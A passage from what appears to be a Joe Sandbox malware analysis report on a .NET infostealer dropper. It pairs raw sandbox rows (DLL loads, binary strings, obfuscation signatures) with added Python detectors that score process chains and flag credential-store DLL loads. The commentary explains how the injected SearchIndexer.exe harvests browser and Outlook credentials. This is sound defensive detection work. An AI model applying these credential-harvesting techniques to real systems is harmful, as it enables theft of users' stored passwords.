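    ProcEvent(1004, 900, r"C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe",
              r'"C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe"'),
    ProcEvent(1005, 1004, r"C:\Windows\SysWOW64\SearchIndexer.exe", r'"C:\Windows\SysWOW64\SearchIndexer.exe"'),
    ProcEvent(1006, 1005, r"C:\Program Files\Mozilla Firefox\firefox.exe", r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'),
    # Benign control (constructed): a task XML from ProgramData must not fire the Temp rule
    ProcEvent(1007, 900, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /Create /TN "Backup" /XML "C:\ProgramData\Backup\task.xml"'),
]
```

Run on EVENTS, detect returns five findings and score_chains attributes three distinct rules to the dropper's tree (PID 1000) and two to the Program Files (x86) copy's tree (PID 1004); the benign schtasks event produces nothing. The second pass matters more than any single rule: a lone Add-MpPreference or a lone RegSvcs.exe launch is noisy in many environments, while three rules under one root within seconds is not.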
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: dwrite.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: textshaping.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\snTlRrBza.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: tquery.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: mssrch.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: cryptdll.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: esent.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: ieframe.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: tquery.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: mssrch.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: cryptdll.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: esent.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Section loaded: wldp.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Section loaded: rasadhlp.dll
            Source: C:\Program Files (x86)\QmuNRfZCByVPgNATVfwPykyzGiTiciaNqPoTEcjStjnByPQVOoWwAyw\qRurKwDVhn.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\SearchIndexer.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
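            The SearchIndexer.exe rows above are worth reading as a set: a process whose job is indexing files loads winsqlite3.dll, vaultcli.dll and dpapi.dll (SQLite for browser login databases, the Credential Manager vault API, and DPAPI to unprotect what it finds) and also opens the Outlook profile key. That combination is the footprint behind the "Tries to harvest and steal browser information" and "Tries to steal Mail credentials" signatures. Note also that qRurKwDVhn.exe, whose network DLL loads appear above, carries Joe Sandbox's own FakeChrome debug path (the Chrome.pdb row among the binary strings), so it is a copy of the sandbox's Chrome stand-in and the behaviour recorded for it belongs to code running inside that copied image, not to the binary as written. The following Python detector is an added example, not part of the Joe Sandbox report: it groups constructed Sysmon Event ID 7 (ImageLoaded) records per process and flags any process outside an assumed allowlist that loads two or more of those credential-store DLLs.

```python
"""Flag processes whose DLL-load footprint matches credential-store access.

Added example, not part of the Joe Sandbox report. The events are constructed
in Sysmon Event ID 7 (ImageLoaded) style; the allowlist of processes expected
to touch these stores is an assumption to be tuned per environment.
"""
import ntpath
import re
from collections import defaultdict

# DLLs that, loaded together by one process, indicate reading of stored
# credentials. They are the loads the report attributes to SearchIndexer.exe.
CRED_STORE_DLLS = {
    "vaultcli.dll": "Windows Credential Manager (vault) API",
    "winsqlite3.dll": "SQLite reader for browser Login Data / logins databases",
    "dpapi.dll": "DPAPI unprotect of stored secrets",
}

# Assumption: processes with a legitimate reason to load this combination.
EXPECTED_LOADERS = {"chrome.exe", "msedge.exe", "firefox.exe", "outlook.exe"}

_KV = re.compile(r"(\w+)=(\S+)")


def parse_events(text):
    """Parse 'Key=Value' lines (values without spaces) into dicts."""
    return [dict(_KV.findall(line)) for line in text.splitlines() if line.strip()]


def find_credential_readers(text, min_hits=2):
    """Group image loads per process and report non-allowlisted processes that
    load at least min_hits of the credential-store DLLs."""
    loaded = defaultdict(set)
    for ev in parse_events(text):
        if ev.get("EventID") != "7":          # only ImageLoaded events count
            continue
        loaded[ev["Image"]].add(ntpath.basename(ev["ImageLoaded"]).lower())
    findings = []
    for image, dlls in loaded.items():
        hits = sorted(dlls & set(CRED_STORE_DLLS))
        if len(hits) >= min_hits and ntpath.basename(image).lower() not in EXPECTED_LOADERS:
            findings.append({"image": image, "dlls": hits})
    return findings


# Constructed events, not taken from the report's own log.
SAMPLE_EVENTS = r"""
EventID=7 Image=C:\Windows\SysWOW64\SearchIndexer.exe ImageLoaded=C:\Windows\SysWOW64\tquery.dll
EventID=7 Image=C:\Windows\SysWOW64\SearchIndexer.exe ImageLoaded=C:\Windows\SysWOW64\winsqlite3.dll
EventID=7 Image=C:\Windows\SysWOW64\SearchIndexer.exe ImageLoaded=C:\Windows\SysWOW64\vaultcli.dll
EventID=7 Image=C:\Windows\SysWOW64\SearchIndexer.exe ImageLoaded=C:\Windows\SysWOW64\dpapi.dll
EventID=7 Image=C:\Users\user\AppData\Local\Google\Chrome\Application\chrome.exe ImageLoaded=C:\Windows\System32\winsqlite3.dll
EventID=7 Image=C:\Users\user\AppData\Local\Google\Chrome\Application\chrome.exe ImageLoaded=C:\Windows\System32\dpapi.dll
EventID=7 Image=C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe ImageLoaded=C:\Windows\SysWOW64\dpapi.dll
"""

if __name__ == "__main__":
    for finding in find_credential_readers(SAMPLE_EVENTS):
        print(finding["image"], "loaded", ", ".join(finding["dlls"]))
```

            A single dpapi.dll load is common (PowerShell loads it above too), which is why the rule needs at least two of the set; the chrome.exe loads are ignored only because the browser is on the assumed allowlist.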
            Source: JeouiaPf03mHSBH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: JeouiaPf03mHSBH.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: JeouiaPf03mHSBH.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: SearchIndexer.pdb source: qRurKwDVhn.exe, 00000010.00000003.2034241645.0000000004673000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000003.2034639712.000000000473C000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2269804952.0000000000BDD000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2270146461.0000000002512000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: RAwd.pdb source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: qRurKwDVhn.exe, 00000010.00000002.2923610433.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp, qRurKwDVhn.exe, 00000012.00000000.2253128743.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp, qRurKwDVhn.exe, 00000014.00000002.2923654418.00000000001EE000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: RAwd.pdbSHA256y source: JeouiaPf03mHSBH.exe, snTlRrBza.exe.0.dr
            Source: Binary string: RegSvcs.pdb, source: SearchIndexer.exe, 00000011.00000002.2927079100.00000000036BC000.00000004.10000000.00040000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000000.2299855317.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2623311348.000000002E7BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000006.00000002.2096368069.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.000000000322E000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2105365281.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.0000000003090000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2096508164.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2342536964.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.0000000003610000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2351477186.000000000346A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000006.00000002.2096368069.00000000014B0000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.000000000322E000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2105365281.0000000002EDF000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2926041065.0000000003090000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000011.00000003.2096508164.0000000002D2F000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2342536964.00000000032BD000.00000004.00000020.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.0000000003610000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000002.2449119622.00000000037AE000.00000040.00001000.00020000.00000000.sdmp, SearchIndexer.exe, 00000013.00000003.2351477186.000000000346A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: SearchIndexer.pdbUGP source: qRurKwDVhn.exe, 00000010.00000003.2034241645.0000000004673000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000010.00000003.2034639712.000000000473C000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2269804952.0000000000BDD000.00000004.00000001.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000012.00000003.2270146461.0000000002512000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: RegSvcs.pdb source: SearchIndexer.exe, 00000011.00000002.2927079100.00000000036BC000.00000004.10000000.00040000.00000000.sdmp, SearchIndexer.exe, 00000011.00000002.2924136902.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, qRurKwDVhn.exe, 00000014.00000000.2299855317.0000000002ADC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.2623311348.000000002E7BC000.00000004.80000000.00040000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.JeouiaPf03mHSBH.exe.9860000.6.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | .Net Code: w8x5PFreYB System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JeouiaPf03mHSBH.exe.47a0010.2.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | .Net Code: w8x5PFreYB System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JeouiaPf03mHSBH.exe.63e0000.3.raw.unpack, PingPong.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JeouiaPf03mHSBH.exe.34631c0.0.raw.unpack, PingPong.cs | .Net Code: System.Reflection.Assembly.Load(byte[])
            Source: 0.2.JeouiaPf03mHSBH.exe.4827230.1.raw.unpack, Ckc4Bt89d71YMmb0gd.cs | .Net Code: w8x5PFreYB System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Code function: 0_2_0812E2DD push FFFFFF8Bh; iretd | 0_2_0812E2DF
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Code function: 0_2_081286C8 pushad ; ret | 0_2_081286C9
            Source: C:\Users\user\Desktop\JeouiaPf03mHSBH.exe | Code function: 0_2_08128F48 pushfd ; retf | 0_2_08128F49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00401A9E push 035C916Eh; retf | 6_2_00401ABB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004143E5 push edx; retf D011h | 6_2_00414489
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041F08A push ss; ret | 6_2_0041F0BD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402154 push 380EA568h; ret | 6_2_00402159
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004073E3 push 00000041h; ret | 6_2_00407412
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004033F0 push eax; ret | 6_2_004033F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0040D3AF push edx; ret | 6_2_0040D3B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004014F6 push es; ret | 6_2_004014F8
